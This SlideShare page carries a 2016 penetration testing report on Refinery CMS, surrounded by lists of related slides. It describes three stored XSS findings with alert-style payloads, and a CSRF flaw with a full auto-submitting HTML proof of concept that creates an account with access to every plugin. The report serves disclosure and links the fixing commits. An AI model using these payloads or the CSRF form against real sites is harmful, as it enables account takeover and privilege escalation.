SlideShare a Scribd company logo

FinalreportCMS

S
Shravan Kumar

The document is a penetration testing report for Refinery CMS that identifies 4 vulnerabilities: 1) Stored XSS vulnerabilities in the title and ALT text fields when uploading images that allow executing malicious scripts. 2) A stored XSS vulnerability in the title field when adding new pages. 3) Cross-site request forgery (CSRF) vulnerabilities across multiple forms that allow unauthorized actions due to a lack of proper anti-CSRF token verification. 4) Details are provided for each vulnerability like steps to reproduce, impacted versions, and links to GitHub issues and commits where the vulnerabilities were addressed.

1 of 12
Download to read offline
1 | P a g e Penetration Testing Report for Refinery CMS Shravan Kumar Budharap (Info-sec researcher & consultant) SECURELAYER7 Shravan.kumar@securelayer7.net www.securelayer7.net
2 | P a g e Table of Contents Introduction ............................................................................................................................................ 1 Identified Vulnerabilities.........................................................................................................................4 PT-RCMS-001: Stored XSS in the Title Text in the image upload ...........................................................4 PT-RCMS-002: Stored XSS in the ALT Text in the image upload ............................................................7 PT-RCMS-003: Stored XSS in the Title of the ADD NEW PAGE….…………………………………………………………9 PT-RCMS-004: Cross site request forgery on multiple events…………………………………………………………….11
3 | P a g e Introduction Refinery CMS, often shortened to Refinery, is an open source content management system written in Ruby as a Ruby on Rails web application with jQuery used as the JavaScript library. Refinery CMS supports Rails 3.2 and Rails 4.2 .Refinery differs from similar products by targeting a non-technical end user and allowing the developer to create a flexible website rapidly by staying as close as possible to the conventions of the Ruby on Rails framework. The penetration test against several parts of the REFINERY CMS took an overall of 3 working days from 4th FEB 2016 to 6th FEB 2016. The testing was performed on the refinerycms-e731bca7360a bundle. All the vulnerabilities found during testing may affect all the version prior to this bundle. Note: All security issues identified and discussed in this document were addressed to the REFINERY CMS development team between 4th FEB 2016 and 6th FEB 2016. All deployed fixes were reviewed and verified by me.
4 | P a g e Identified Vulnerabilities The following sections list both vulnerabilities and implementation issues spotted during the testing period. Note that findings are listed in a chronological order rather than by their degree of severity and impact. The aforementioned severity rank is simply given in brackets following the title heading for each vulnerability. Each vulnerability is additionally given a unique identifier (e.g. PT-RCMS-XXX) for the purpose of facilitating any future follow-up correspondence. PT-RCMS-001: Stored XSS in the Title Text in the image upload (Medium) It seems that the display engine i.e. WYSIWYG used in the refinery CMS is not properly sanitizing the html entities before displaying them on the page. This issue is addressed in the Github. https://github.com/refinery/refinerycms/issues/3097 The Commit link which fixed the issue. https://github.com/refinery/refinerycms/commit/ed05cf9ccb4cb1603e62d99b40af097993fba4e4 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to image tabs. 3. Click on Add new image. 4. Select an image to upload. 5. In the Title box insert the XSS payload. 6. Write anything in the ALT box. 7. Click on save button. 8. Move mouse pointer over the info icon found below the uploaded image. 9. We can see that the XSS payload gets executed. The XSS payload used ‘<marquee onscroll=confirm(1)>XSS’
5 | P a g e The below image shows the vulnerable fields. These images shows the payload and the XSS in action.
6 | P a g e The XSS payload being executed.
7 | P a g e PT-RCMS-002: Stored XSS in the ALT Text in the image upload (Medium) This vulnerability is same as PT-RCMS-001 but in a different location. This issue is addressed in the Github https://github.com/refinery/refinerycms/issues/3097 The Commit link which fixed the issue. https://github.com/refinery/refinerycms/commit/ed05cf9ccb4cb1603e62d99b40af097993fba4e4 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to image tabs. 3. Click on Add new image. 4. Select an image to upload. 5. Write anything in the title box. 6. In the ALT box insert the XSS payload. 7. Click on save button. 8. Move mouse pointer over the info icon found below the uploaded image. 9. We can see that the XSS payload gets executed. The XSS payload used ‘<marquee onscroll=confirm(2)>XSS’ The below image shows the payload.
8 | P a g e The below image shows the execution of XSS payload
9 | P a g e PT-RCMS-003: Stored XSS in the Title of the ADD NEW PAGE (Medium) This issue is addressed in the Github. https://github.com/refinery/refinerycms/issues/3097 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to pages tabs. 3. Click on Add new page. 4. Insert the XSS payload in the title box. 5. Write anything in the body. 6. Click on save button. 7. Open the saved pages in the new browser window and we can see that the XSS payload gets executed. The XSS payload used <img src=x onerror=confirm(2)/> The XSS vulnerable field is shown in below image. The below image shows the payload.
10 | P a g e The Below image shows the payload in action.
11 | P a g e PT-RCMS-004: Cross site request forgery on multiple events. During testing I found that the anti CSRF token used in the form field is not verified properly to process the forms. The Forms are processed even though the authenticity_token is left blank this resulted in the CSRF vulnerability. This issue was addressed in Github. https://github.com/refinery/refinerycms/issues/3098 This is the link to the commit which fixed the issues. https://github.com/refinery/refinerycms/commit/9fd5a8b5e98827431add4a4c997286f10092cb9c The Proof of Concept PoC.html is <html> <!-- CSRF PoC - Add New account --> <body> <form name="csrf" id="csrf" action="http://localhost:3000/refinery/users" method="PATCH"> <!-- change the action value according to the server--> <input type="hidden" name="utf8" value="â&#156;&#147;" /> <input type="hidden" name="authenticity&#95;token" value="" /> <input type="hidden" name="user&#91;username&#93;" value="csrf" /> <input type="hidden" name="user&#91;full&#95;name&#93;" value="csrf" /> <input type="hidden" name="user&#91;email&#93;" value="csrf&#64;csrf&#46;com" /> <input type="hidden" name="user&#91;password&#93;" value="csrf" /> <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="csrf" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;files" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;images" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;pages" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;authentication&#95;devise" /> <input type="submit" value="Submit form" /> </form> <script>document.getElementById("csrf").submit();</script> </body> </html> When a Logged in Administrator opens the PoC.html a new user (CSRF) is created with permission to access all plugins. This exploit can be used by least privilege users to elevate to the administrator level or for deletion of an existing user, creation of new user with full permissions to access all the plugins.
12 | P a g e

Recommended

PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsPVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
 
Tivoli perfviewer
Tivoli perfviewerTivoli perfviewer
Tivoli perfvieweritsolvs
 
2 20613 qualys_top_10_reports_vm
2 20613 qualys_top_10_reports_vm2 20613 qualys_top_10_reports_vm
2 20613 qualys_top_10_reports_vmazfayel
 
Nc vulnerability assessment
Nc vulnerability assessment Nc vulnerability assessment
Nc vulnerability assessment Land Rehabilitation Society of Southern Africa
 
Vulnerability scanning report by Tareq Hanaysha
Vulnerability scanning report by Tareq HanayshaVulnerability scanning report by Tareq Hanaysha
Vulnerability scanning report by Tareq HanayshaHanaysha
 
80133823 backdor-nectcat-through-smb
80133823 backdor-nectcat-through-smb80133823 backdor-nectcat-through-smb
80133823 backdor-nectcat-through-smbjeweh
 
6kbbs vulnerability report
6kbbs vulnerability report6kbbs vulnerability report
6kbbs vulnerability reportinsight-labs
 
QualysGuard InfoDay 2014 - Vulnerability management
QualysGuard InfoDay 2014 - Vulnerability managementQualysGuard InfoDay 2014 - Vulnerability management
QualysGuard InfoDay 2014 - Vulnerability managementRisk Analysis Consultants, s.r.o.
 

Recommended

PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsPVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOps
PVS-Studio Is Now in Chocolatey: Checking Chocolatey under Azure DevOpsAndrey Karpov
 
Tivoli perfviewer
Tivoli perfviewerTivoli perfviewer
Tivoli perfvieweritsolvs
 
2 20613 qualys_top_10_reports_vm
2 20613 qualys_top_10_reports_vm2 20613 qualys_top_10_reports_vm
2 20613 qualys_top_10_reports_vmazfayel
 
Nc vulnerability assessment
Nc vulnerability assessment Nc vulnerability assessment
Nc vulnerability assessment Land Rehabilitation Society of Southern Africa
 
Vulnerability scanning report by Tareq Hanaysha
Vulnerability scanning report by Tareq HanayshaVulnerability scanning report by Tareq Hanaysha
Vulnerability scanning report by Tareq HanayshaHanaysha
 
80133823 backdor-nectcat-through-smb
80133823 backdor-nectcat-through-smb80133823 backdor-nectcat-through-smb
80133823 backdor-nectcat-through-smbjeweh
 
6kbbs vulnerability report
6kbbs vulnerability report6kbbs vulnerability report
6kbbs vulnerability reportinsight-labs
 
QualysGuard InfoDay 2014 - Vulnerability management
QualysGuard InfoDay 2014 - Vulnerability managementQualysGuard InfoDay 2014 - Vulnerability management
QualysGuard InfoDay 2014 - Vulnerability managementRisk Analysis Consultants, s.r.o.
 
JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816Jeff Conrad
 
IS 533 Course Project
IS 533 Course ProjectIS 533 Course Project
IS 533 Course ProjectJoseph Perry, MS
 
Nopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel VulnerabilitiesNopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel VulnerabilitiesAbdSec
 
Vulnerability scanning project
Vulnerability scanning projectVulnerability scanning project
Vulnerability scanning projectChirag Dhamecha
 
Operating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability reportOperating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability reportAjit Gaddam
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Maksim Kochkin
 
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0 OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0 Scott Lee Davis
 
Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015Frank Breedijk
 
Nessus v6 command_line_reference
Nessus v6 command_line_referenceNessus v6 command_line_reference
Nessus v6 command_line_referenceCraig Cannon
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
already-0wned
already-0wnedalready-0wned
already-0wnedegypt
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaHanaysha
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaHanaysha
 
Accuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersAccuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersLarry Suto
 
Operating system vulnerability and control
Operating system vulnerability and control Operating system vulnerability and control
Operating system vulnerability and control أحلام انصارى
 
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...Andrey Karpov
 
Monitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo ScriptMonitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo ScriptMicrosoft TechNet
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionSandro Gauci
 
Single Page Application Best practices
Single Page Application Best practicesSingle Page Application Best practices
Single Page Application Best practicesTarence DSouza
 
PVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOpsPVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOpsAndrey Karpov
 
Sap bpc Planning and consolidation
Sap bpc Planning and consolidationSap bpc Planning and consolidation
Sap bpc Planning and consolidationSreekanth Gogula
 

More Related Content

Viewers also liked

JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816Jeff Conrad
 
Nopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel VulnerabilitiesNopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel VulnerabilitiesAbdSec
 
Vulnerability scanning project
Vulnerability scanning projectVulnerability scanning project
Vulnerability scanning projectChirag Dhamecha
 
Operating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability reportOperating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability reportAjit Gaddam
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Maksim Kochkin
 
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0 OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0 Scott Lee Davis
 
Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015Frank Breedijk
 
Nessus v6 command_line_reference
Nessus v6 command_line_referenceNessus v6 command_line_reference
Nessus v6 command_line_referenceCraig Cannon
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17Eoin Keary
 
already-0wned
already-0wnedalready-0wned
already-0wnedegypt
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaHanaysha
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationRobert Rowley
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaHanaysha
 
Accuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersAccuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersLarry Suto
 
Operating system vulnerability and control
Operating system vulnerability and control Operating system vulnerability and control
Operating system vulnerability and control أحلام انصارى
 

Viewers also liked (16)

JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816JConrad_Mod11_FinalProject_031816
JConrad_Mod11_FinalProject_031816
 
IS 533 Course Project
IS 533 Course ProjectIS 533 Course Project
IS 533 Course Project
 
Nopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel VulnerabilitiesNopcon '16 Android Kernel Vulnerabilities
Nopcon '16 Android Kernel Vulnerabilities
 
Vulnerability scanning project
Vulnerability scanning projectVulnerability scanning project
Vulnerability scanning project
 
Operating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability reportOperating systems security 2007 vulnerability report
Operating systems security 2007 vulnerability report
 
Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)Web application security (RIT 2014, rus)
Web application security (RIT 2014, rus)
 
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0 OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
OWASP PDX May 2016 : Scanning with Swagger (OAS) 2.0
 
Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015Automated Security Testing with Seccubus confidence 2015
Automated Security Testing with Seccubus confidence 2015
 
Nessus v6 command_line_reference
Nessus v6 command_line_referenceNessus v6 command_line_reference
Nessus v6 command_line_reference
 
03. sql and other injection module v17
03. sql and other injection module v1703. sql and other injection module v17
03. sql and other injection module v17
 
already-0wned
already-0wnedalready-0wned
already-0wned
 
Nessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq HanayshaNessus scan report using the defualt scan policy - Tareq Hanaysha
Nessus scan report using the defualt scan policy - Tareq Hanaysha
 
Nmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumerationNmap Scripting Engine and http-enumeration
Nmap Scripting Engine and http-enumeration
 
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq HanayshaNessus scan report using microsoft patchs scan policy - Tareq Hanaysha
Nessus scan report using microsoft patchs scan policy - Tareq Hanaysha
 
Accuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scannersAccuracy and time_costs_of_web_app_scanners
Accuracy and time_costs_of_web_app_scanners
 
Operating system vulnerability and control
Operating system vulnerability and control Operating system vulnerability and control
Operating system vulnerability and control
 

Similar to FinalreportCMS

PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...Andrey Karpov
 
Monitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo ScriptMonitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo ScriptMicrosoft TechNet
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionSandro Gauci
 
Single Page Application Best practices
Single Page Application Best practicesSingle Page Application Best practices
Single Page Application Best practicesTarence DSouza
 
PVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOpsPVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOpsAndrey Karpov
 
Sap bpc Planning and consolidation
Sap bpc Planning and consolidationSap bpc Planning and consolidation
Sap bpc Planning and consolidationSreekanth Gogula
 
Deployment of Debug and Trace for features in RISC-V Core
Deployment of Debug and Trace for features in RISC-V CoreDeployment of Debug and Trace for features in RISC-V Core
Deployment of Debug and Trace for features in RISC-V CoreIRJET Journal
 
TYPO3 6.2. What's new
TYPO3 6.2. What's newTYPO3 6.2. What's new
TYPO3 6.2. What's newRafal Brzeski
 
Flavours - Classic/Technical BDD
Flavours - Classic/Technical BDDFlavours - Classic/Technical BDD
Flavours - Classic/Technical BDDDavid Harrison
 
Overview & Downloading the Baseline using Global Configuration Managemen tand...
Overview & Downloading the Baseline using Global Configuration Managemen tand...Overview & Downloading the Baseline using Global Configuration Managemen tand...
Overview & Downloading the Baseline using Global Configuration Managemen tand...Bharat Malge
 
CA-PMM Syste Recommendations v3
CA-PMM Syste Recommendations v3CA-PMM Syste Recommendations v3
CA-PMM Syste Recommendations v3Matthew Gibbs
 
Load testing with vs 2013
Load testing with vs 2013Load testing with vs 2013
Load testing with vs 2013Fahad Shiekh
 
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTX
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTXMaximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTX
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTXRajKumar813803
 
Guidelhhghghine document final
Guidelhhghghine document finalGuidelhhghghine document final
Guidelhhghghine document finalnanirao686
 
Embedding custom ActiveX controls into SAP GUI
Embedding custom ActiveX controls into SAP GUIEmbedding custom ActiveX controls into SAP GUI
Embedding custom ActiveX controls into SAP GUIDr. Kerem Koseoglu
 

Similar to FinalreportCMS (20)

PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
PVS-Studio and Continuous Integration: TeamCity. Analysis of the Open RollerC...
 
Monitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo ScriptMonitoring Windows Server Systems Demo Script
Monitoring Windows Server Systems Demo Script
 
Bounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC editionBounty bout 0x01 - WebRTC edition
Bounty bout 0x01 - WebRTC edition
 
Single Page Application Best practices
Single Page Application Best practicesSingle Page Application Best practices
Single Page Application Best practices
 
PVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOpsPVS-Studio in the Clouds: Azure DevOps
PVS-Studio in the Clouds: Azure DevOps
 
Sap bpc Planning and consolidation
Sap bpc Planning and consolidationSap bpc Planning and consolidation
Sap bpc Planning and consolidation
 
Release Management Plan
Release Management PlanRelease Management Plan
Release Management Plan
 
KB Article 1-FINAL
KB Article 1-FINALKB Article 1-FINAL
KB Article 1-FINAL
 
Deployment of Debug and Trace for features in RISC-V Core
Deployment of Debug and Trace for features in RISC-V CoreDeployment of Debug and Trace for features in RISC-V Core
Deployment of Debug and Trace for features in RISC-V Core
 
TYPO3 6.2. What's new
TYPO3 6.2. What's newTYPO3 6.2. What's new
TYPO3 6.2. What's new
 
Flavours - Classic/Technical BDD
Flavours - Classic/Technical BDDFlavours - Classic/Technical BDD
Flavours - Classic/Technical BDD
 
Overview & Downloading the Baseline using Global Configuration Managemen tand...
Overview & Downloading the Baseline using Global Configuration Managemen tand...Overview & Downloading the Baseline using Global Configuration Managemen tand...
Overview & Downloading the Baseline using Global Configuration Managemen tand...
 
DevOps Project
DevOps Project DevOps Project
DevOps Project
 
CA-PMM Syste Recommendations v3
CA-PMM Syste Recommendations v3CA-PMM Syste Recommendations v3
CA-PMM Syste Recommendations v3
 
Load testing with vs 2013
Load testing with vs 2013Load testing with vs 2013
Load testing with vs 2013
 
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTX
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTXMaximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTX
Maximo Application Suite 8.4 & 8.5 Learning & Resources Guide.PPTX
 
Trytond-SugarCRM integration
Trytond-SugarCRM integrationTrytond-SugarCRM integration
Trytond-SugarCRM integration
 
Final Project Report
Final Project ReportFinal Project Report
Final Project Report
 
Guidelhhghghine document final
Guidelhhghghine document finalGuidelhhghghine document final
Guidelhhghghine document final
 
Embedding custom ActiveX controls into SAP GUI
Embedding custom ActiveX controls into SAP GUIEmbedding custom ActiveX controls into SAP GUI
Embedding custom ActiveX controls into SAP GUI
 

FinalreportCMS

  • 1. 1 | P a g e Penetration Testing Report for Refinery CMS Shravan Kumar Budharap (Info-sec researcher & consultant) SECURELAYER7 Shravan.kumar@securelayer7.net www.securelayer7.net
  • 2. 2 | P a g e Table of Contents Introduction ............................................................................................................................................ 1 Identified Vulnerabilities.........................................................................................................................4 PT-RCMS-001: Stored XSS in the Title Text in the image upload ...........................................................4 PT-RCMS-002: Stored XSS in the ALT Text in the image upload ............................................................7 PT-RCMS-003: Stored XSS in the Title of the ADD NEW PAGE….…………………………………………………………9 PT-RCMS-004: Cross site request forgery on multiple events…………………………………………………………….11
  • 3. 3 | P a g e Introduction Refinery CMS, often shortened to Refinery, is an open source content management system written in Ruby as a Ruby on Rails web application with jQuery used as the JavaScript library. Refinery CMS supports Rails 3.2 and Rails 4.2 .Refinery differs from similar products by targeting a non-technical end user and allowing the developer to create a flexible website rapidly by staying as close as possible to the conventions of the Ruby on Rails framework. The penetration test against several parts of the REFINERY CMS took an overall of 3 working days from 4th FEB 2016 to 6th FEB 2016. The testing was performed on the refinerycms-e731bca7360a bundle. All the vulnerabilities found during testing may affect all the version prior to this bundle. Note: All security issues identified and discussed in this document were addressed to the REFINERY CMS development team between 4th FEB 2016 and 6th FEB 2016. All deployed fixes were reviewed and verified by me.
  • 4. 4 | P a g e Identified Vulnerabilities The following sections list both vulnerabilities and implementation issues spotted during the testing period. Note that findings are listed in a chronological order rather than by their degree of severity and impact. The aforementioned severity rank is simply given in brackets following the title heading for each vulnerability. Each vulnerability is additionally given a unique identifier (e.g. PT-RCMS-XXX) for the purpose of facilitating any future follow-up correspondence. PT-RCMS-001: Stored XSS in the Title Text in the image upload (Medium) It seems that the display engine i.e. WYSIWYG used in the refinery CMS is not properly sanitizing the html entities before displaying them on the page. This issue is addressed in the Github. https://github.com/refinery/refinerycms/issues/3097 The Commit link which fixed the issue. https://github.com/refinery/refinerycms/commit/ed05cf9ccb4cb1603e62d99b40af097993fba4e4 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to image tabs. 3. Click on Add new image. 4. Select an image to upload. 5. In the Title box insert the XSS payload. 6. Write anything in the ALT box. 7. Click on save button. 8. Move mouse pointer over the info icon found below the uploaded image. 9. We can see that the XSS payload gets executed. The XSS payload used ‘<marquee onscroll=confirm(1)>XSS’
  • 5. 5 | P a g e The below image shows the vulnerable fields. These images shows the payload and the XSS in action.
  • 6. 6 | P a g e The XSS payload being executed.
  • 7. 7 | P a g e PT-RCMS-002: Stored XSS in the ALT Text in the image upload (Medium) This vulnerability is same as PT-RCMS-001 but in a different location. This issue is addressed in the Github https://github.com/refinery/refinerycms/issues/3097 The Commit link which fixed the issue. https://github.com/refinery/refinerycms/commit/ed05cf9ccb4cb1603e62d99b40af097993fba4e4 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to image tabs. 3. Click on Add new image. 4. Select an image to upload. 5. Write anything in the title box. 6. In the ALT box insert the XSS payload. 7. Click on save button. 8. Move mouse pointer over the info icon found below the uploaded image. 9. We can see that the XSS payload gets executed. The XSS payload used ‘<marquee onscroll=confirm(2)>XSS’ The below image shows the payload.
  • 8. 8 | P a g e The below image shows the execution of XSS payload
  • 9. 9 | P a g e PT-RCMS-003: Stored XSS in the Title of the ADD NEW PAGE (Medium) This issue is addressed in the Github. https://github.com/refinery/refinerycms/issues/3097 The steps to produce the vulnerability are 1. Log in the refinery CMS. 2. Go to pages tabs. 3. Click on Add new page. 4. Insert the XSS payload in the title box. 5. Write anything in the body. 6. Click on save button. 7. Open the saved pages in the new browser window and we can see that the XSS payload gets executed. The XSS payload used <img src=x onerror=confirm(2)/> The XSS vulnerable field is shown in below image. The below image shows the payload.
  • 10. 10 | P a g e The Below image shows the payload in action.
  • 11. 11 | P a g e PT-RCMS-004: Cross site request forgery on multiple events. During testing I found that the anti CSRF token used in the form field is not verified properly to process the forms. The Forms are processed even though the authenticity_token is left blank this resulted in the CSRF vulnerability. This issue was addressed in Github. https://github.com/refinery/refinerycms/issues/3098 This is the link to the commit which fixed the issues. https://github.com/refinery/refinerycms/commit/9fd5a8b5e98827431add4a4c997286f10092cb9c The Proof of Concept PoC.html is <html> <!-- CSRF PoC - Add New account --> <body> <form name="csrf" id="csrf" action="http://localhost:3000/refinery/users" method="PATCH"> <!-- change the action value according to the server--> <input type="hidden" name="utf8" value="â&#156;&#147;" /> <input type="hidden" name="authenticity&#95;token" value="" /> <input type="hidden" name="user&#91;username&#93;" value="csrf" /> <input type="hidden" name="user&#91;full&#95;name&#93;" value="csrf" /> <input type="hidden" name="user&#91;email&#93;" value="csrf&#64;csrf&#46;com" /> <input type="hidden" name="user&#91;password&#93;" value="csrf" /> <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="csrf" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;files" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;images" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;pages" /> <input type="hidden" name="user&#91;plugins&#93;&#91;&#93;" value="refinery&#95;authentication&#95;devise" /> <input type="submit" value="Submit form" /> </form> <script>document.getElementById("csrf").submit();</script> </body> </html> When a Logged in Administrator opens the PoC.html a new user (CSRF) is created with permission to access all plugins. This exploit can be used by least privilege users to elevate to the administrator level or for deletion of an existing user, creation of new user with full permissions to access all the plugins.
  • 12. 12 | P a g e